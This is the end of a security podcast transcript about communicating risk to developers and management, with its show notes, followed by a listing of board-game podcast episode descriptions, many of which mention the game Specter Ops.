Brian "Noid" Harden 29:10 even though even though I had nothing to do with it, I'm the accountable one. So, yeah, you have, you know, you need to be able to express things in terms that they translates to, you know, finding out like, like one of the things I back when I used to be a consultant, one of the things I always ask the executive types I'd meet on jobs is what keeps you up at night. You know, what keeps you up at night? Like what you know, don't don't worry about what I'm concerned about, what are you concerned about? Because they might be the same thing. I'm just going to talk to you about it using again, using the words that you care for and understand because I see a lot of technical people try to describe risk to non technical people and they do it by being highly technical and when it's not being understood. They fall back to being even more they take the approach of being in France... not speaking French. So I'm going to speak slower and louder, right?
And, and at the end of the day, they're just going to keep shaking their heads going, Man, this guy really wants to express something to make.

Bryan Brake 30:18 Yeah, something must be really important...

Brian "Noid" Harden 30:20 ...to agitated by it. I don't know what it is...

Bryan Brake 30:23 Great, now it's blue monkey poo. I don't know what's going on.

Brian "Noid" Harden 30:26 Yeah, so that's, that's it. So yeah. When you're when you're talking to leadership, expressing things in terms of the contract violations, SLA violations, financial financial impact, right? You know, like, like, one of the things I liked when PCI came out and they had like these ridiculous up to $10,000 per bit of PII that gets disclosed and then you explain to a room full of high level people that and if blank were to happen 40,000 bits of PII would be exposed a you know and I'm not so good at math but my calculator here tells me at $10,000 a pop and you watch people in the room real quiet...

Bryan Brake 31:10 oh yeah no that now you know the thing is you just haven't seen a Leviathan one yet so you know if you want to you know reach out to us we'll do a pentest for you we when we don't mind coming out and hanging out doing pen tests for you so

Brian "Noid" Harden 31:24 Frank's a good friend, solid solid human being

Bryan Brake 31:26 no I mean will take your money and will give you a good will give you good drubbing. You will not get up and down left and right. You'll make it hurt. So anyway, actually, yeah, we we actually might need to talk about that a little bit later. I would not hate on that. I get money when people come in its new business. So yeah, I wouldn't hate on that at all.

Brian Boettcher 31:47 I like in in your last phrase or last sentence in your presentation. If you can, avoid even using the word security. I think that's a good summary of what we talked about.

Bryan Brake 32:00 Yeah, that got me too. I was like, Wow. Okay.
So it's like, it's like the buzzword you're not supposed to say or, you know, like, you get a shock..

Brian "Noid" Harden 32:08 Treat it like a game. Yeah. Yeah, you got it like a game. But you you'd be amazed it works

Bryan Brake 32:16 hundred percent of the time. It works every time?

Brian "Noid" Harden 32:18 Yeah, hundred percent of the works every time. But, ya know, it it it definitely works because there are people too because there's conditioning, right. The history between security people and software developers is deep and it goes back

Bryan Brake 32:33 it's contentious

Brian "Noid" Harden 32:34 it's contentious at times. And, you know, obviously, you know, you try to try to try to be a good human being, trying to better the world around you. You know, try to, when you whenever you go somewhere, try to leave it in a better condition than you found it. But also understand that the person who may have been there for you may have just straight up just f the place up

Brian Boettcher 32:58 scorched earth

Brian "Noid" Harden 32:59 Yep, yeah. so and so. Yeah. And sometimes, because, I mean, I've got, I've rolled into organizations before where it's like, Why are these people so mad at me? I just got here... And it's like, oh, because the guy you replaced was just got off. And then and it sucks because it's not fair that you have to rebuild those damaged relationships because you didn't damage them. but life ain't fair?

Bryan Brake 33:22 Yep. Well, you know, what, the, the, the whole, you know, DevOps and those things, that was the, you know, the Elysian Fields for developers like, Oh, I can go do anything and enjoy everything, and then it's like, you know, we're, the "no" department where the, we're the where the ones are going to put manacles on them.
So, you know, security folks have have got to learn to be flexible, compliance folks can't wield their hammer anymore, like they, they should, if they want to, you know, play with the developers in the devops and the management folks, we talked about this with Liz Rice couple weeks ago about getting, you know, security into the devops area and it's like one we got it we gotta learn to be flexible we've got to help them understand that now yeah the bug feature stuff if I'd heard this when we were talking to her I'm almost certain she would agree with us on the fact that you know we can't treat security like security we have treated as feature enhancement in this case

Brian "Noid" Harden 34:16 it is a feature, you know it is a feature and increase the stability of the product that can get increases the customer base of the product it's right it has all the same things to it that any other feature would, but yeah but as far as the security being the note apartment thing to something else is like I still run into security people that they look at themselves as the "No" department that kind of pride themselves on Yeah, and when you find those people just call them out. I mean, just just tell them like, Look, man, that doesn't work. It's never work. Stop it now. Because when you're viewed as the "no" department, no one will ever want to work with you. Why would you want to?

Bryan Brake 34:57 Yep... you're a non-starter

Brian "Noid" Harden 34:59 Yeah, what's go because that was a bit of career advice I got at one point was that basically be solutions focused. You know, nobody wants to basically you're not going to go anywhere if you're the person who's calling out the problem and you might be calling out the problem more articulately than anybody else in the room, you might have a better understanding of the scope of them the depth of the problem, but there is a whole class of manager out there that will just be like, Man, that Noid guy, nothing but problems.
Whereas if you instead say, you know, you kind of focus on the sort of the not really the problem, but rather you focus on the solution... "be solutions oriented" to sound like a business guy for a second. And it's like, yeah, you'd be that solutions oriented person, and especially if you can do it with a sort of positive spin, like I had a boss at one point I would stop in his office pissed off every once in a while, and I just be like this is screwed up and that screwed up and blah, blah blah. And he stopped and go "leave my office now and come back in and restate everything you just said. But in a positive way." I don't even know how it will then go sit in the hallway for a few minutes she would come back and I'd be like, okay, we have an opportunity for us. And I tell you I hated them for it. But name if it didn't work.

Bryan Brake 36:32 Oh god. Yeah, that would make complete sense. Yeah, coming in with a positive instead of negative.

Brian "Noid" Harden 36:40 So that's the thing. It's like yeah, even when your negativity is spot on and accurate. There's a lot of people that are like.. "ugh the person is always negative" And then sure enough, yeah, you start focusing on like, oh, you're the positive solutions oriented guy. Even while you're telling them that it's all basically like we're all going to Hell, but I'm doing it in a positive solutions oriented manner, and you'd be amazed how much traction I get you.

Bryan Brake 37:06 Mr. Boettcher, do you have any other thoughts or questions? I want to let Mr. Noid go, cuz he's getting a little ty ty, he's a bit sleepy and he needs to go to bed...

Brian Boettcher 37:15 There's a lot of great tidbits in here. I'm gonna have to listen to it again, and get all of them. And, and again, there's a lot of Manager Tools references here and, and Manager Tools, if you're not a manager, that's okay. It's not for managers, all that stuff they talk about is is really valuable to all employees.
Brian "Noid" Harden 37:39 What's it called, the Manager Tools podcast?

Bryan Brake 37:42 Yep. It's been going on for 12 years.

Brian Boettcher 37:45 Since 2006

Bryan Brake 37:46 Yeah, something like that. It's it's very big. We put a link to the three powers three types of power and one to rule them all in the in the show notes as well. So yeah, go listen to that. I listened to that it's it's one of my regular non-info sec podcast that I listened to, so I listen to it every Monday morning, and when I'm on the treadmill at the gym, so yeah, really, really excellent stuff. If you're, you're out there and, you know, yeah, I mean, it'll help you kind of understand, but if you're out there and you're not a manager yet, it might help you understand where your manager's coming from, too. All right. Mr. Noid how would people get a hold of you if they wanted to maybe have you for more podcasts appearances or, you know, speaking engagements or whatever? Are you going to be speaking anywhere soon?

Brian "Noid" Harden 38:39 Am I I don't know. No, I don't think I am right. Sorry. Are you going anywhere? So question? I am there you go. I am speaking soon. Yeah, I'm, I'm speaking at the NCC group. Open Forum. Oh, that's right. That's next weekend. I don't think it's actually been announced yet. Okay. It's I mean, it's cool for me to talk about it. But yes, it's...

Bryan Brake 39:02 the 12 (of March) yeah it is the 12th in Fremont, so if you're outside of the Seattle area you're going to be SOL.. yeah they don't record that

Brian "Noid" Harden 39:15 but but I'm going to be giving basically the abbreviated version of my BSides talk. they had they had an empty slot they needed to fill up... and they basically said could you do it I said sure and then they said it's 30 minutes long and I'm like well my talks an hour, but how will will make it work... they're I think they're a Tableau up in Fremont...
Bryan Brake 39:37 yeah I'm on that list and yeah I know Miss Crowell over there who's one of the senior managers at NCC she's great lady... she's actually not running she used to run it and and gave somebody else but she still helps out a when she can but yeah, really, really great quarterly open forum that NCC group puts out. Plus they put out a nice spread for dinner certainly good Brian "Noid" Harden 40:00 I haven't been the one in a while, but they usually a lot of fun. I wouldn't last one of those I went to was a TLS 1.3 Bryan Brake 40:09 I was at that one too. Brian "Noid" Harden 40:10 That worked out great. Because literally the following weekend, I spoke at DC 206 nice about TLS 1.2 right? and ended up getting Joe to come along and speak about TLS 1.3 and a much more authoritative manner than I could have. It's bad ass. Bryan Brake 40:24 Yeah, Joe. Joe was on the steering committee for that. Brian "Noid" Harden 40:28 Yep. Yeah, I think but yeah, that was also nice. He kept me honest. While I was given my talk. I periodically just look at them any kind of nod. I'm not going into the weeds yet. But yeah, as far as getting a hold of me goes the best way to do it is I'm on Twitter @_noid_ or you can email me at noid23@gmail.com Bryan Brake 40:52 Yeah so yeah if you're in the Seattle area and the downtown Seattle area or Fremont area that's really nice place I think parking I think was at a premium The last time we were there Brian "Noid" Harden 40:52 It's Fremont, parking is always at a premium Bryan Brake 40:52 they're dodging bikes or whatever like motorized bicycles or whatever so you know Brian Boettcher 40:52 scooters now Bryan Brake 40:52 yeah I mean Fremont area they're really weird about their bicycle laws and stuff up there so Brian "Noid" Harden 41:07 ...and zoned parking so watch for your park too Bryan Brake 41:32 I'm going to get Miss Berlin because you know she's got a lot going on she's you know heading up the mental health hackers group.. 
you can find her was it hacker... god I hate this, um... she's @infosystir on Twitter. hackers mental health is her nonprofit. She's running that and you can find that @hackershealth on Twitter, she will come to your convention or conference and do a village. And and, you know it's a nice chill area you can go to, if you're interested in doing that Brian "Noid" Harden 42:12 is truly doing the Lord's work too. Bryan Brake 42:14 Yes she is. And we're very proud of her for all that she's doing. So yeah, her and Megan Roddy who's also one of our slack slack moderators... So speaking of our slack we have a very active slack community we just like I said we have "JB" who was promoted to moderator because it's been far too long and he's been doing the the European and Asia book club and he should have been a moderator for a while so did that today gave him access to our secret moderator channel and such and but yeah we have a social contract you can join us by emailing bds.podcast@gmail.com or hitting our Twitter which is the the podcast Twitter @brakesec and you can follow me on Twitter.@bryanbrake. Mr. Boettcher, you got a lot going on to sir how would people find you if we wanted to talk about the log MD stuff? Brian Boettcher 43:10 yeah you just go to log-MD.com... Don't forget the dash right otherwise you'll you'll get some well nevermind... Bryan Brake 43:20 Is it like WhiteHouse.com *laughs* that's an old joke kids! Brian Boettcher 43:26 I'd like to say though if you if you do go by your developers donuts or whoever don't eat any between the pickup and drop off right because then you'll show up with four donuts and they'll be like oh thanks great there's 10 of us and you bring us for Donuts Bryan Brake 43:41 {imitating Forrest Gump]"I had some sorry" Don't do that yeah yea buy 13 donuts and then eat one for yourself and then say you got it doesn't you go yeah so you're making an appearance you're going to be Bsides Austin at the end of the month along with Ms. 
Berlin's going to be that one as well. I think? Brian Boettcher 44:00 I am... Megan's going to be there I'm not sure. Very cool as her home base so we'll see. Nice. Yeah and the classes are cheap. I don't know if they're sold out yet but it's like $100 bucks. Bryan Brake 44:13 Okay, awesome. Cool. Before we go, we have a store. If you want to go buy a T shirt for the Brakeing Down Security logo, you know, you can definitely go do that or get one with Miss Berlin's face on it. Which is very weird but it's still very cool I'm going to probably by pink one here in the next few weeks and thank you to our patrons people who help support the podcast but donating some money helps pay for hosting pays for the time that we're doing this also we're looking into adding some possible transcription services we've gotten a couple emails from people who are saying they want to get transcriptions of us saying "uh, um, ah" lot so I actually actually it was a gentleman by the name of Willie I think was said head hearing difficulties so he wanted to know if we had a transcription of the podcast and I feel really bad because I'm like I don't know how to reply to him and say I you know we're just a little mom and pop shop here so we're looking at transcription services maybe something like Mechanical Turk or there was one called otter.ai that we're we're looking at to maybe kind of make it better for people to hear these things Brian "Noid" Harden 45:26 I'm actually actually suffer from degenerative hearing loss. I'm slowly going deaf myself Bryan Brake 45:31 I've got tinnitus is from the Navy Brian "Noid" Harden 45:32 same here. It's permanent and ongoing. And just yeah, it's like I feel for him. Yep. And hopefully transcriptions will be a thing at some point. Yeah, god's I hope so. Yeah, I mean, other than the US and about 800 times during podcast I apologize for that. 
But yeah, so we're, we're trying to look into that if if we can make it work we will we will do our utmost to make the podcast as available as possible to everybody. So in end up to be we have to hire somebody, he'll do it for us. So that that may be another thing, which means will need more pot Patreon money, you know that kind of thing. So if you're interested in getting full transcripts we may make that possible if we can get another maybe 20 to 30 people a 20-30 bucks a month. So but we do appreciate that the tips the you know we call them tips because you're helping to support the podcast and helping us get this out. And yeah, so for Miss Berlin who's not here sadly. And she's going to be kicking yourself because this was a really awesome podcast and Mr. Boettcher. This is Brakeing Down Security from a world headquarters here in Seattle. Have a great week. Be nice to another. Please take care of yourselves because you're the only you have and we'll talk again soon. Brian Boettcher 46:45 Bye bye Brian "Noid" Harden 46:46 Bye Internet people. Transcribed by https://otter.ai
Log-MD story (quick one) (you’ll like this one, Mr. Boettcher)
SeaSec East meetup "Gabe" https://www.sammamish.us/government/departments/information-technology/ransomware-attack-information-hub/
New Slack Moderator (@cherokeeJB)
Shoutout to “Jerry G”
Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407
www.Workshopcon.com/events and that we're looking for BlueTeam trainers please
Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet
Noid - @_noid_ noid23@gmail.com
Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3
Slides (PDF) https://github.com/noid23/Presentations/blob/master/BSides_2019/Its%20Not%20a%20Bug%20Its%20a%20Feature%20-%20Seattle%20BSides%202019.pdf
Security view was a bit myopic?
“What do we win by playing?”
Cultivating relationships (buy lunch, donuts, etc)
Writing reports
Communicating findings that resonate with developers and management
Often pentest reports are seen by various facets of folks
Many levels of competency (incompetent -> super dev/sec)
Communicating risk?
Making bugs make sense to everyone…
The three types of power: https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com
#Brakesec Store!: https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: bds.podcast@gmail.com
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Have you ever wanted to beat all of your friends at a game? Jack and Joel talk about the concept of One Vs. Many, where a single player takes on the rest of the gaming group. Some popular titles in this vein: Scotland Yard, Fury of Dracula, and Specter Ops
André Zabuzeta brings the week's news in Jogatina BG News, and right after that Jack welcomes Fabrício from the @After Match channel for a chat about his impressions of CCXP 2018.
1 - Publisher Thunderworks Games announced for 2019 the game Cartographers: A Roll Player Tale, a game by the Brazilian Jordy Adan with a paper-and-pen mechanic for 2-99 players, in which the players are cartographers competing for the most reputation in the northern lands at the end of 4 seasons. In each season the players, by drawing on their map sheets, try to meet Queen Gimnax's demands by controlling regions with outposts and reducing the advance of the Draguls. http://bit.ly/2QttCEU
2 - During the updates on the Project: ELITE KS, CMON announced that its next campaign will be for Blood Rage Digital. This digital version will have single-player and multiplayer modes, and the campaign will also include some exclusive content for the physical version of the title. https://www.kickstarter.com/projects/cmon/blood-rage-digital
3 - Publisher Calliope Games announced that in 2019 it will run a Kickstarter campaign for Tsuro: Phoenix Rising. This title will be a reimplementation of the classic Tsuro and will have phoenix miniatures, for 2-8 players. https://boardgamegeek.com/boardgame/266177/tsuro-phoenix-rising
4 - Stonemaier Games published a teaser for its next title: Wingspan, designed by Elizabeth Hargrave, for 1-5 players. According to the game's page on BGG, the game will feature a card-driven system, dice rolling and engine-building elements: https://boardgamegeek.com/boardgame/266192/wingspan
5 - Publisher Ludofy announced the merger of the publishers Mandala Jogos and Ludofy under the name GROK. As shown in the image below, titles aimed at the children's, party, family and casual audiences will still be published through Mandala Jogos, and titles from casual up to heavy will fall under Ludofy. See more information released in Rafael Verri's broadcast: https://www.facebook.com/ludofy/videos/512741015869594
6 - Publisher CMON, in partnership with Cranio Creations, announced Walls of York for early 2019, a game for 2-4 players whose goal is to build barriers, with plastic pieces on a grid board, to protect your cities from Viking raids; whoever holds the most coins at the end of the 2nd era wins the game. https://www.boardgamegeek.com/boardgame/247980/walls-york
7 - During the PAX Unplugged 2018 event, held from 30/11 to 02/12 of 2018 in Philadelphia, Pennsylvania, IDW Games announced the Metal Gear Solid board game, which will be by designer Emerson Matsuuchi, designer of the game Specter Ops and of the Century: Spice Road series. It will be a cooperative tactical espionage game for 1-4 players based on the famous video game franchise created by Hideo Kojima. https://www.google.com/search?q=metal+gear+solid&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj7g8arw5jfAhWDFZAKHfIhBmcQ_AUIDigB&biw=1920&bih=976#imgrc=_
8 - Last Tuesday, 04/12, during the broadcast here on the Meeple Maniacs channel, Galápagos Jogos announced KeyForge: Call of the Archons for the Brazilian market, with publication planned for the 1st half of 2019. http://bit.ly/keyforgebr
9 - {KS} The Kickstarter campaign by Awaken Realms for Tainted Grail: Fall of Avalon has started. It is a cooperative adventure game set in the universe of the Arthurian tales for 1-4 players with 8 miniatures, 4 player boards, many cards, manuals and books, and it guarantees a campaign of 15 scenarios lasting 30-40 hours. It has already raised US$ 1,945,275 of the US$ 50,910 requested, with 17,957 backers, and there are 22 days left until the end of funding. https://www.kickstarter.com/projects/awakenrealms/tainted-grail-the-fall-of-avalon
This program is brought to you by our subscribers. Become a monthly supporter of the channel at https://www.catarse.me/meeplemaniacs
We welcome back Brenna Noonan from Starling Games to talk about their newest 1 vs. many game, Anomaly, live on Kickstarter on October 21, 2018. This project was formerly called Ø: Fear Nothing. However, it struggled out of the gate, so Starling decided to pull the plug, repackage, offer a lower price point, and present the same game with a different name - Anomaly. Jason gives a bit of context for the campaign relaunch before presenting the episode. After the preamble, we present the former episode in its entirety. Where you hear the name "Ø: Fear Nothing", please translate that in your head as Anomaly. We get into where the (former) name came from and also how Anomaly distinguishes itself mechanically from similar 1 vs. Many games like Specter Ops. Anomaly probably has a bit too much interaction here to support solo play, but fans of high level, above the table cooperative play might be very interested in what it has to offer. Finally, somewhere in the episode, Jason gets on his soapbox and beseeches gamers everywhere to give companies a chance!
I hope you're planning your Arkhipov Day festivities. Don't get me wrong, I dig Stanislav Petrov as much as the next guy, but for my money Vasili Arkhipov is the man, and he doesn't get nearly enough credit. Because, you know, he either saved your life or your ancestors' lives--the least we could do is give the man a holiday. He doesn't even have a card in Twilight Struggle! See, I brought it back to games in the end.
Games Played Last Week:
-Galaxy Trucker: Missions 3m00s (Vlaada Chvátil, CGE, 2015)
-Terraforming Mars: Prelude 6m04s (Jacob Fryxelius, Stronghold, 2018)
-Quartermaster General: Prelude 7m01s (Ian Brody, Griggling Games, 2018)
-Star Wars: Imperial Assault - Jabba's Realm 9m24s (Todd Michlitsch & Paul Winchester, FFG, 2017)
-Specter Ops 10m24s (Emerson Matsuuchi, Plaid Hat Games, 2015)
-Master of the Galaxy 14m54s (Timofey Bokarev & Konstantin Seleznev, Ares Games, 2018)
-Paper Tales: Beyond the Gate 19m38s (Masato Uesugi, Stronghold, 2018)
News (and why it doesn't matter)
-Fog of Love expands to LGBTQ scenarios 24m22s
-Z-Man Lords over Vegas 25m34s
-SVWAG SWAG: Take our stuff 26m20s
-Pfister Blacks Out Hong Kong 27m46s
-Mac Gerdts brings the love in Concordia 28m37s
-Terraforming Mars digitally 29m40s
-Chip Theory's neoprene obsession 30m00s
Feature Game: 31m28s
-Level 7 [Omega Protocol] (Will Schoonover, Privateer Press, 2013)
Topic: Keeping Games Moving 57m42s
At Tabletop Bellhop we answer your game and game night questions, go "Ask The Bellhop" at https://tabletopbellhop.com/.
Ep #9 Under the Hood. Mermaid Adventures, Terra Mystica, and Gloomhaven before we deep dive into game mechanics.
Please subscribe to our YouTube Channel
This is the Ninth episode of Tabletop Bellhop Live, an edited version of our live show recorded on September 26th, 2018. Join us as we stream live every week Wednesday’s at Nine Thirty Eastern: https://www.twitch.tv/tabletopbellhop
Disclosure: Some links below are Amazon Affiliate links. As an Amazon Associate, we earn from qualifying purchases.
This episode includes:
---Viewer/Listener Feedback---
We read off and respond to listener feedback. Send feedback to moe@tabletopbellhop.com or sean@tabletopbellhop.com
---Tabletop Gaming Weekly---
A look at what games hit The Bellhop's table over the last week. Board Game Arena, 7 Wonders, Race for the Galaxy, Terra Mystica, Terraforming Mars, Tales of Equestria, Mermaid Adventures, Gloomhaven
Other links: Windsor Sandwich Shop, Shut Up & Sit Down Gloomhaven Review
Related Blog Posts: https://tabletopbellhop.com/playing-tabletop-games/wdypm-sept24/
---Announcements---
You can find us all across the web now and we grow by the support of listeners and viewers like you, so please take a minute to subscribe to our content on your favorite platform or give us a like, thumbs up or review. We have a newsletter, sign up for weekly updates in your mail. https://newsletter.tabletopbellhop.com
---Ask The Bellhop---
Each week we answer at least one viewer question. This week: NecroDaddy80 on Twitch asks: “What game mechanics do you prefer?”
Games mentioned approximately in order mentioned: Caylus, Puerto Rico, Clank!, Core Worlds, Carcassonne, Isle of Skye, Pandemic, FASA Star Trek, Race for the Galaxy, Warhammer Underworlds: Shadespire, Through the Desert, Agricola, El Grande, Cry Havok, 7 Wonders, Power Grid, Going, Going, GONE! Poker, Spartacus: A Game of Blood and Treachery, Hammer of the Scots, Star Wars, Imperial Assault, Zombicide, Command & Colors Ancients, The Thing: Infection at Outpost 31, Clue, Magic The Gathering, Medieval Academy, Dominion, Concordia, Hyperborea, Orleans, The Duke, Bandu, Drop It!, Pitchcar, Monopoly, Pictionary, Pictomania, Russian Railroads, Risk, Kemet, Rising Sun, Chess, Onitama, Bohnanza, Mahjong Ticket To Ride, Advanced Squad Leader, Battlelore 2e, Starship Troopers, Hanabi, Chinatown, Fury of Dracula, Specter Ops, Scotland Yard, Mansions of Madness, Star Wars Imperial Assault, XCOM, Azul, Wasteland Express Delivery Service, Tsuro, Hellapagos (the Survivor game Sean mentions), Werewolf, Nine Men’s Morris, Tokaido, CV, Blackjack, 1812 Invasion of Canada, Pillars of the Earth, Space Alert, Fallout The Board Game, Untold: Adventures Await, Rory’s Story Cubes, Gloomhaven, Xia, Legends of a Drift System, Catan, Chocolate Edition, Yahtzee, Saint Malo, Shipyard, Gin Rummy, Ticket to Ride, Robo Rally Mechs Vs. Minions Race for the Galaxy, The Thing: Infection at Outpost 31, Battlestar Galactica 1846, San Francisco Cable Car, Biblios, Munchkin, Rumble in the Dungeon, Clank! In! Space!, Carcassonne, Patchwork, Dominos, Terraforming Mars, Catan, Diamonds, Hearts, Spades, Twilight Imperium,
Other links: XCOM Enemy Unkown Columbia Games (Block Wargames) Flip Florey’s Super Saturday Board Game Serial,
Related Blog Post: https://tabletopbellhop.com/gaming-advice/game-mechanics/
---Blog Plug and Patreon Shout Out---
Head over to the Tabletop Bellhop Blog where you can read more about today’s topics and more. The Tabletop Bellhop Blog: https://tabletopbellhop.com
If you enjoyed the show be sure to tip The Bellhop at: patreon.com/tabletopbellhop
Find us all over the web:
Facebook www.facebook.com/tabletopbellhop/
Twitter twitter.com/tabletopbellhop
Instagram www.instagram.com/tabletopbellhop/
Google Plus plus.google.com/u/1/communities/105133123664243159789
BoardGameGeek boardgamegeek.com/guild/3347
YouTube www.youtube.com/channel/UCez3cu7peTRAcb1ZJF4j5A?subconfirmation=1
Twitch twitch.tv/tabletopbellhop
Today we’re celebrating our one year anniversary, and because this episode is coming out a day late, it is actually coming out on our one year anniversary! So in honor of making it a full year, we’re going back to our very first category and revisiting hidden movement with Specter Ops and Nuns on the Run. In our Broader View, we reflect on the last year of recording this podcast. Thank you to everyone that has been on this journey with us! [00:00:00] - Introduction [00:01:07] - Hidden Movement [00:02:12] - Specter Ops [00:20:01] - Nuns on the Run [00:31:25] - Comparison [00:37:11] - Other Hidden Movement Games [00:41:40] - Broader View
Emerson Matsuuchi has had some hits with Century: Spice Road, Crossfire and Specter Ops. But what about an abstract game about underwater coral placement? Join the MFGCast as we talk about Reef by Plan B Games. http://mfgcast.com/wp-content/uploads/2018/09/Episode_202_Final.mp3
Tim Jennette (Metal Meeple), and Matt RoBear are joined by special guests: designer Emerson Matsuuchi (Century, Reef, Volt, Specter Ops), Ann Pohl (Boardgame Corner), and Roy Cannaday (Epic Gaming Night podcast), to talk about Gencon 2018 and other very cool things! This episode was recorded on Sunday August 5th at 11 am Est at Gencon 2018
Published on Apr 25, 2018 It is time for the motley to make their move on Abford Pharma. **Pre-show ends at 13:00** Join our heroes in the World of Darkness as Sophia, Patches and Braum navigate a fine line between Glamour and Banality. In Changeling: the Dreaming, faerie souls live in human hosts in the modern world. Watch live on Twitch: http://www.twitch.tv/jonverrall Check out http://www.rpgclinic.com for character backstories, video archives, forums, and more! #ChangelingTS Follow us! http://www.twitter.com/jonverrall http://www.twitter.com/zen_r0b0 http://www.twitter.com/elizabethaneale http://www.twitter.com/shumphrey1212 Want to send us stuff? Use my P.O. Box! Elizabeth Neale CP 22586 Monkland PO Montreal, QC H4A 1E0
Join Isaac as he shares all of his adventures from Origins with you! We have play-throughs of prototype games, reviews, and interviews with multiple game designers and distributors! Enjoy! Intro - :21; USAopoly - 1:09; Tasty Minstrel Games - 9:48; Emerson Matsuuchi (Century: Spice Road, Specter Ops, Reef) - 12:03; Brotherwise Games (Boss Monster) - 27:30; Late Night Play Test - Dr. Horribles Evil League of Evil - 30:48; Wizkids - 39:05; Calliope - 48:17. Join the conversation on any of the following platforms! www.GamingWithSidekicks.com, YouTube Channel, Facebook, Instagram, Direct Link
The week of Top 100 Cooperative Games continues! You guys know the drill - go ahead and check out the Broken Meeple YouTube channel for the original video version of this list: https://www.youtube.com/channel/UCmjyHBcqxxQjrg0KUN944dQ Timestamps provided for user friendliness. Enjoy! 3:41 - #40 - Legendary: Marvel 9:57 - #39 - Escape: Curse of the Temple 13:27 - #38 - Exit/ Unlock 17:06 - #37 - Sherlock Holmes: Consulting Detective 20:16 - #36 - Not Alone 24:56 - #35 - Elder Sign 30:09 - #34 - Forbidden Island 32:07 - #33 - Paperback 35:15 - #32 - Specter Ops 39:55 - #31 - Professor Evil and the Citadel of Time
In Games in Schools and Libraries 101 JS Bragg and Bethany MacMillan join Kathleen Mercury to talk about how they teach a course on leadership at Miami University of Ohio using board games.
Bethany MacMillan, Coordinator of Student Activities, Miami University Middletown Campus. Facebook: GamingGirl.Bethany (message me also to tell me who you are, please). Email:
JS Bragg, Assistant Director, Student Activities & The Cliff Alexander Office of Fraternity & Sorority Life, Miami University. Twitter, Instagram, etc: @JotaEsetheGeek. BoardGameGeek: jotaese. Facebook: JSBragg (message me also to tell me who you are, please). E-mail: JSBragg@MiamiOH.edu
About the class: Blog: http://blogs.miamioh.edu/tabletop/ Original Player’s Handbook (syllabus): https://drive.google.com/file/d/0B0g_xFM37S-kQkY1MXJLM2VDblU/view?usp=sharing
Sponsoring Departments: Miami University EDL Department: http://miamioh.edu/ehs/academics/departments/edl/ Miami University IMS Department: http://miamioh.edu/cca/aims/ Miami University Center for Teaching Excellence: http://miamioh.edu/cte/ Miami University Division of Student Affairs: http://miamioh.edu/student-life/student-affairs/index.html
Theories: Bloom’s Taxonomy of Learning (Bloom); Learning Partnership Model (Baxter Magolda); Drew Dudley: http://www.drewdudley.com
Resources: The Shapes of Leadership (by Phil Stamper (pstamper1@hotmail.com) and Michael McNeil); NASAGA: NASAGA.org, Facebook: nasagaorg, Twitter: @nasaga; Everyday Leadership: https://www.youtube.com/watch?v=hVCBrkrFrBE The Leadership Game: https://www.youtube.com/watch?v=EuB9S6fzMig The Game Has No Winners https://www.youtube.com/watch?v=b3ADu08wQE0 First Follower: https://www.youtube.com/watch?v=fW8amMCVAJQ Heifetz & Linsky's Leading With An Open Heart: http://lci.typepad.com/leaders_resourcing_leader/files/LeadingWithAnOpenHeart.pdf Kouzes & Posner's Five Practices of Exemplary Leadership: http://www.leadershipchallenge.com/about-section-our-approach.aspx
Games/Topics Breakdown (Week, Tabletop Game(s) | Leadership Themes):
1: Resistance, Foundational | Vocabulary Building
2: Secret Hitler, Hanabi | Views of Team Leadership/Theories of Leadership
3: Betrayal at the House on the Hill | Views of Personal Leadership/Theories of Leadership
4: Mysterium, Corrupted Kingdoms | What is Identity? Who am I?
5: Survive, 2 Rooms and a Boom | Values
6: Ladies and Gentlemen | Identity and Interactions
7: Wits & Wagers, Say Anything, 7 Wonders, Spyfall 2 | Views of Identity and Self: Section Review
8: Pandemic, Ultimate Werewolf | Group Roles and Dynamics
9: Captain Sonar, Forbidden Island | Group Communication
10: TIME Stories, Pathfinder Adventure Card Game | “Victory Points”: What Counts as “Successful” Leadership?
11: The Grizzled, Telestrations, Codenames, Specter Ops | Group Leadership and Social Responsibilities: Section Review
12-14: No Games to Purchase for these weeks - Student Created Tabletop Games | Innovative Leadership, Leadership Through Gaming
Games in Schools and Libraries is produced in association with Inverse Genius and the Georgetown County Library System. Games in Schools and Libraries Guild at Board Game Geek. Kathleen's resources https://www.kathleenmercury.com/ Email us: schoolsandlibraries@gmail.com The ideas expressed by libraries included in the podcast are not expressly endorsed by the Georgetown County Library System.
Originally aired in November of 2015, our first episode brings Zach, Sean and Chad together to discuss the hidden movement game Specter Ops from Plaid Hat Games.
Podcast Interview With Andy Robbins, Rohan Vazarkar, SpecterOps by The Neo4j Graph Database Community
